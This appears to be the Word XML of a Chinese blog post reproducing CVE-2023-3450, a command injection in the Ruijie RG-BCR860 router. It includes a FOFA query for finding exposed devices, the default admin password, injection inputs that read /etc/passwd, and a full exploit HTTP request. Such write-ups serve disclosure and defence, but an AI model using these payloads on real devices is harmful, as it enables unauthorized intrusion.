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C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="210"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>【漏洞情报 | 新】CVE-2023-3450 锐捷</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>Ruijie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>路由器命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23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"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>原创</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>4Zen</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="000C7C23">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
          </w:rPr>
          <w:t>划水但不摆烂</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>2023-08-01 22:07</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>发表于广西</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>收录于合集</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="576B95"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>#漏洞复现</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>6个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="EF7060"/>
        </w:pBdr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EF7060"/>
        </w:rPr>
        <w:t>免责声明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文章所涉及内容，仅供安全研究与教学之用，由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C7C23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0C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为此承担任何责任。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="EF7060"/>
        </w:pBdr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EF7060"/>
        </w:rPr>
        <w:t>产品简介</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RG-BCR860是锐</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>捷网络</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>推出的一款商业云路由器，它是专为酒店、餐饮、门店设计，适用带宽100Mbps,带机量可达150台，支持Sec VPM、内置安全审计模块，给商家带来更好的网络营销体验 。该产品主支持全中文的WEB 界面配置，不再需要用传统的命令行进行配置，使得设备更加简单方便的进行维护和管理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="EF7060"/>
        </w:pBdr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EF7060"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeas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0C7C2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76800" cy="1647991"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="7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887" cy="166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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ruijie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> RG-BCR860 2.5.13版本存在操作系统命令注入漏洞，该漏洞源于组件Network Diagnostic Page存在问题，会导致操作系统命令注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="EF7060"/>
        </w:pBdr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EF7060"/>
        </w:rPr>
        <w:t>如何识别锐捷RG-BCR860</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>favicon图标特征</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C2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C7C2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C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FOFA网络测绘搜索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C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C7C23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icon_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C7C23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=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23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"-399311436"</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23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</w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="EF7060"/>
        </w:pBdr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EF7060"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>该漏洞属于后台漏洞，需要输入密码进入后台（默认密码admin）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C2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C7C2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07000" cy="2336722"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985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747" cy="235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C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>总体概览处可查看设备型号与当前版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C2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C7C2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08550" cy="1531000"/>
            <wp:effectExtent l="0" t="0" r="635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465" cy="154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C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击左下角的“网络诊断”，在“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>检测”的“地址”框中，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="1E6BB8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>127.0.0.1;cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="1E6BB8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="1E6BB8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="1E6BB8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，接着点击“开始检测”，会在检测框中回</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>显命令</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>执行结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C2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C7C2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54930" cy="2472457"/>
            <wp:effectExtent l="0" t="0" r="7620" b="4445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296" cy="249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C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="1E6BB8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>127.0.0.1|id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C2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C7C2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88682" cy="3155950"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635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669" cy="316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C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>命令执行数据包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C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7C23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GET /cgi-bin/luci/;stok=9ba3cc411c1cd8cf7773a2df4ec43d65/admin/diagnosis?diag=tracert&amp;tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&amp;seq=1 HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23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Host: IP:PORT</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23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Accept: */*</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23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Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C7C23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gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C7C23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, deflate</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23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X-Requested-With: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C7C23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XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C7C23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DNT: 1</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23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Connection: close</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23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Referer: http://IP:PORT/cgi-bin/luci/;stok=9ba3cc411c1cd8cf7773a2df4ec43d65/admin/diagnosis</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7C23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Cookie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C7C23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sysauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C7C23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=b0d95241b0651d5fbaac5de8dabd2110</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C2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C7C2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64100" cy="1507270"/>
            <wp:effectExtent l="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78" cy="152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C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="EF7060"/>
        </w:pBdr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
